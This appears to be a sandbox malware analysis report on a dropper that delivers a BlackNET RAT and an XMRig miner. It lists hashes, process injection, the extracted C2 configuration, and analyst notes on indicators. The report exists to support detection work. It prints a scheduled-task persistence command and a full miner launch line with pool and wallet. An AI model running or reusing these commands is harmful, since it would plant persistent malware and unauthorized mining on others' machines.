Analysis

Max time kernel: 151s
Max time network: 154s
Platform: windows10_x64
Resource: win10v20210408
Submitted: 23-07-2021 00:06

Tasks
Static task: static1
Behavioral task: behavioral1
Sample: 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe
Resource: win7v20210410

The memory-dump and YARA resource paths below are prefixed behavioral2, so the results shown are from the windows10_x64 / win10v20210408 run, not from the win7v20210410 task listed above.
General
Target: 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe
Size: 3.2MB
MD5: af711c6269728cc41a4b6cab99dc00d2
SHA1: 02a1cff69f43552c5aa6fea7547e5f68018dbc84
SHA256: 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c
SHA512: 94b6ba8fcdbb5dd175096e305698a41078fb1a99725610bb49159d02ccf2484b01fd7bfcf48fb4644af6b92c77453855f7eba46445f93ff449317f25613bb8a6
Malware Config

Extracted: blacknet v3.7.0 Public
OTwjgZ
http://54.237.66.139
BN[a4bfa882efc194e2bcd370ea]
antivm: false
elevate_uac: false
install_name: WindowsUpdate.exe
splitter: |BN|
start_name: 19eb68018edbdeae69b26450d3d0915f
startup: false
usb_spread: false

Note that no file named WindowsUpdate.exe appears among the dropped files listed below; the files actually written in this run are phone.exe, phoneupdate.exe, userupdate.exe, sihost64.exe and WR64.sys, so the configured install_name is not a usable file indicator for this trace.
Signatures

BlackNET Payload (4 IoCs)
  yara_rule family_blacknet matched on:
    behavioral2/memory/1568-124-0x0000000000400000-0x000000000063C000-memory.dmp
    behavioral2/memory/1568-125-0x000000000063636E-mapping.dmp
    C:\Users\Admin\AppData\Local\Temp\phone.exe
    C:\Users\Admin\AppData\Local\Temp\phone.exe

Contains code to disable Windows Defender (4 IoCs)
  A .NET executable tasked with disabling Windows Defender capabilities such as real-time monitoring, block at first sight, etc.
  yara_rule disable_win_def matched on:
    behavioral2/memory/1568-124-0x0000000000400000-0x000000000063C000-memory.dmp
    behavioral2/memory/1568-125-0x000000000063636E-mapping.dmp
    C:\Users\Admin\AppData\Local\Temp\phone.exe
    C:\Users\Admin\AppData\Local\Temp\phone.exe
  The disable_win_def hits land on exactly the same resources as family_blacknet (the vbc.exe PID 1568 image region and phone.exe), i.e. the Defender-disabling code is part of the BlackNET payload rather than a separate component.

XMRig Miner Payload (3 IoCs)
  yara_rule xmrig matched on:
    behavioral2/memory/1808-188-0x0000000140000000-0x0000000140758000-memory.dmp
    behavioral2/memory/1808-189-0x00000001402EB66C-mapping.dmp
    behavioral2/memory/1808-191-0x0000000140000000-0x0000000140758000-memory.dmp
Blocklisted process makes network request (2 IoCs)
  flow 19  pid 1808  cmd.exe
  flow 21  pid 1808  cmd.exe

Executes dropped EXE (5 IoCs)
  pid 488   phone.exe
  pid 3852  phoneupdate.exe
  pid 764   sihost64.exe
  pid 644   userupdate.exe
  pid 1508  sihost64.exe
Uses the VBS compiler for execution (1 TTP)
  vbc.exe, the VB.NET compiler shipped in the .NET Framework directory, does no compiling here: it is launched with the literal argument "{path}" and serves as the injection target for the BlackNET payload (see SetThreadContext and WriteProcessMemory below).

Legitimate hosting services abused for malware hosting/C2 (1 TTP)
Suspicious use of SetThreadContext (2 IoCs)
  PID 992  4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe  set thread context of  1568  vbc.exe
  PID 644  userupdate.exe                                                          set thread context of  1808  cmd.exe
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's stock description labels this likely ransomware behaviour, but nothing else in this report points that way: the payloads identified are a BlackNET RAT and an XMRig miner, no file encryption is recorded, and the extracted BlackNET config carries a usb_spread option (false here). Treat the drive enumeration as a generic indicator, not as evidence of ransomware.
Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 3544  schtasks.exe
  pid 2796  schtasks.exe

Suspicious behavior: EnumeratesProcesses (19 IoCs, collapsed by process)
  pid 992   4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe  x2
  pid 488   phone.exe                                                                x13
  pid 3852  phoneupdate.exe                                                          x2
  pid 644   userupdate.exe                                                           x2
Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Token: SeDebugPrivilege       pid 992   4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe
  Token: SeDebugPrivilege       pid 488   phone.exe
  Token: SeDebugPrivilege       pid 3852  phoneupdate.exe
  Token: SeDebugPrivilege       pid 644   userupdate.exe
  Token: SeLockMemoryPrivilege  pid 1808  cmd.exe
  Token: SeLockMemoryPrivilege  pid 1808  cmd.exe
  SeDebugPrivilege is the privilege injectors enable so OpenProcess/WriteProcessMemory succeed regardless of the target's owner; SeLockMemoryPrivilege ("Lock pages in memory") in the miner-hosting cmd.exe (PID 1808) is the privilege XMRig enables so RandomX can back its dataset with large pages.
Suspicious use of SetWindowsHookEx (2 IoCs)
  pid 488  phone.exe  x2

Suspicious use of WriteProcessMemory (44 IoCs, collapsed to distinct writer/target pairs)
  PID 992   4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe  wrote to  2268  vbc.exe          x3
  PID 992   4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe  wrote to  1568  vbc.exe          x8
  PID 1568  vbc.exe                                                                  wrote to  488   phone.exe        x2
  PID 1568  vbc.exe                                                                  wrote to  3852  phoneupdate.exe  x2
  PID 3852  phoneupdate.exe                                                          wrote to  408   cmd.exe          x2
  PID 408   cmd.exe                                                                  wrote to  3544  schtasks.exe     x2
  PID 3852  phoneupdate.exe                                                          wrote to  764   sihost64.exe     x2
  PID 3852  phoneupdate.exe                                                          wrote to  644   userupdate.exe   x2
  PID 644   userupdate.exe                                                           wrote to  2204  cmd.exe          x2
  PID 2204  cmd.exe                                                                  wrote to  2796  schtasks.exe     x2
  PID 644   userupdate.exe                                                           wrote to  1508  sihost64.exe     x2
  PID 644   userupdate.exe                                                           wrote to  1808  cmd.exe          x15
  Only two pairs involve a process that was then used as an execution host (992 -> 1568 vbc.exe and 644 -> 1808 cmd.exe); both are also the targets of SetThreadContext above. The remaining pairs are the ordinary parent/child writes made when creating a process.
Processes

PIDs are taken from the signature tables above; the sandbox tree itself records only the nesting depth.

C:\Users\Admin\AppData\Local\Temp\4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe  (PID 992)
    "C:\Users\Admin\AppData\Local\Temp\4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

  C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe  (PID 2268)
      "{path}"
      (written to three times by PID 992; no further activity recorded for this instance)

  C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe  (PID 1568)
      "{path}"
      - Suspicious use of WriteProcessMemory
      (injection target: PID 992 set its thread context and wrote to it eight times; the family_blacknet and disable_win_def rules match in its memory at 0x400000)

    C:\Users\Admin\AppData\Local\Temp\phone.exe  (PID 488)
        "C:\Users\Admin\AppData\Local\Temp\phone.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx

    C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe  (PID 3852)
        "C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      C:\Windows\System32\cmd.exe  (PID 408)
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"' & exit
          - Suspicious use of WriteProcessMemory

        C:\Windows\system32\schtasks.exe  (PID 3544)
            schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"'
            - Creates scheduled task(s)

      C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe  (PID 764)
          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
          - Executes dropped EXE

      C:\Users\Admin\AppData\Roaming\userupdate.exe  (PID 644)
          "C:\Users\Admin\AppData\Roaming\userupdate.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

        C:\Windows\System32\cmd.exe  (PID 2204)
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"' & exit
            - Suspicious use of WriteProcessMemory

          C:\Windows\system32\schtasks.exe  (PID 2796)
              schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"'
              - Creates scheduled task(s)
              (same task as PID 3544 created; /f overwrites it, so the Roaming copy re-arms its own persistence every time it runs)

        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe  (PID 1508)
            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            - Executes dropped EXE

        C:\Windows\System32\cmd.exe  (PID 1808)
            C:\Windows/System32\cmd.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.c3pool.com:13333 --user=439KJy5uZoHFetfkQ45pdjRnjLzN1TsFn2NLxPcZbTMwTqJGGpJw4SEM4NhUygc7xacM16VKBNq2Hfe52KmiWTpE46UsCLH --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
            - Blocklisted process makes network request
            - Suspicious use of AdjustPrivilegeToken
            (the image is cmd.exe but the arguments are XMRig's: PID 644 set its thread context, the xmrig rule matches in its memory at 0x140000000, and it is the process holding SeLockMemoryPrivilege; the pool mine.c3pool.com:13333 and the --user wallet are the network indicators to take from this run)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\phone.exe
  MD5     a18b7cb1fe97912ffc3e38d76ccc0462
  SHA1    c5908c111223d69f532973643381983ba385c1c1
  SHA256  2d5e2831e24496bd74a7a2317f824657905cdadaeb00f5c6e33e9b75c5231a2f
  SHA512  d92025f6eb3ab4a594113813284361694ce1b78cfd513d88f4ea842ea7d37c91976066b33089c4da048e39cc4c65654637d2a14138327df40f89d4bb0963be1c

C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe
  MD5     c169f9a4c5c32e4ceb4ff58d1c86e969
  SHA1    8cdad283c3c44202cb3dc50928d8f80ce885715c
  SHA256  aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6
  SHA512  3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
  MD5     0c0195c48b6b8582fa6f6373032118da
  SHA1    d25340ae8e92a6d29f599fef426a2bc1b5217299
  SHA256  11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
  SHA512  ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5     94de80b9dbb3379c59a370b83bbffd90
  SHA1    9b65d5fba13c1174af142de9fdb17cd9989332fc
  SHA256  5808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b
  SHA512  1fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7

C:\Users\Admin\AppData\Roaming\userupdate.exe
  MD5     c169f9a4c5c32e4ceb4ff58d1c86e969
  SHA1    8cdad283c3c44202cb3dc50928d8f80ce885715c
  SHA256  aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6
  SHA512  3c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b
  (byte-identical to phoneupdate.exe above: the dropper copies itself to %APPDATA% under the name the "userupdate" scheduled task executes)

Memory dumps (PID-index-range; size where the sandbox recorded one)
  memory/408-162-0x0000000000000000-mapping.dmp
  memory/488-156-0x000002B777510000-0x000002B777512000-memory.dmp  8KB
  memory/488-141-0x0000000000000000-mapping.dmp
  memory/488-148-0x000002B75CF50000-0x000002B75CF51000-memory.dmp  4KB
  memory/488-159-0x000002B777515000-0x000002B777517000-memory.dmp  8KB
  memory/488-158-0x000002B777512000-0x000002B777513000-memory.dmp  4KB
  memory/488-157-0x000002B777513000-0x000002B777514000-memory.dmp  4KB
  memory/644-180-0x00000000013D0000-0x00000000013D1000-memory.dmp  4KB
  memory/644-177-0x000000001C620000-0x000000001C622000-memory.dmp  8KB
  memory/644-167-0x0000000000000000-mapping.dmp
  memory/644-187-0x00000000013C0000-0x00000000013CA000-memory.dmp  40KB
  memory/764-168-0x0000000000780000-0x0000000000781000-memory.dmp  4KB
  memory/764-164-0x0000000000000000-mapping.dmp
  memory/764-176-0x000000001C2A0000-0x000000001C2A2000-memory.dmp  8KB
  memory/764-174-0x0000000000F90000-0x0000000000F92000-memory.dmp  8KB
  memory/992-122-0x0000000005DE0000-0x0000000006076000-memory.dmp  2.6MB
  memory/992-121-0x0000000004690000-0x0000000004692000-memory.dmp  8KB
  memory/992-116-0x0000000007530000-0x0000000007531000-memory.dmp  4KB
  memory/992-117-0x00000000070D0000-0x00000000070D1000-memory.dmp  4KB
  memory/992-118-0x0000000007030000-0x000000000752E000-memory.dmp  5.0MB
  memory/992-119-0x0000000007230000-0x0000000007231000-memory.dmp  4KB
  memory/992-120-0x0000000009510000-0x0000000009511000-memory.dmp  4KB
  memory/992-114-0x0000000000090000-0x0000000000091000-memory.dmp  4KB
  memory/992-123-0x0000000006510000-0x0000000006754000-memory.dmp  2.3MB
  memory/1508-181-0x0000000000000000-mapping.dmp
  memory/1508-196-0x000000001BF00000-0x000000001BF02000-memory.dmp  8KB
  memory/1568-124-0x0000000000400000-0x000000000063C000-memory.dmp  2.2MB
  memory/1568-136-0x0000000009C60000-0x0000000009C61000-memory.dmp  4KB
  memory/1568-125-0x000000000063636E-mapping.dmp
  memory/1568-134-0x0000000009AA0000-0x0000000009F9E000-memory.dmp  5.0MB
  memory/1808-194-0x00000193343C0000-0x00000193343E0000-memory.dmp  128KB
  memory/1808-197-0x00000193343E0000-0x0000019334400000-memory.dmp  128KB
  memory/1808-188-0x0000000140000000-0x0000000140758000-memory.dmp  7.3MB
  memory/1808-189-0x00000001402EB66C-mapping.dmp
  memory/1808-191-0x0000000140000000-0x0000000140758000-memory.dmp  7.3MB
  memory/1808-190-0x0000019332AE0000-0x0000019332B00000-memory.dmp  128KB
  memory/2204-178-0x0000000000000000-mapping.dmp
  memory/2796-179-0x0000000000000000-mapping.dmp
  memory/3544-163-0x0000000000000000-mapping.dmp
  memory/3852-161-0x000000001C2F0000-0x000000001C2F2000-memory.dmp  8KB
  memory/3852-160-0x000000001C700000-0x000000001C91B000-memory.dmp  2.1MB
  memory/3852-153-0x0000000000490000-0x0000000000491000-memory.dmp  4KB
  memory/3852-150-0x0000000000000000-mapping.dmp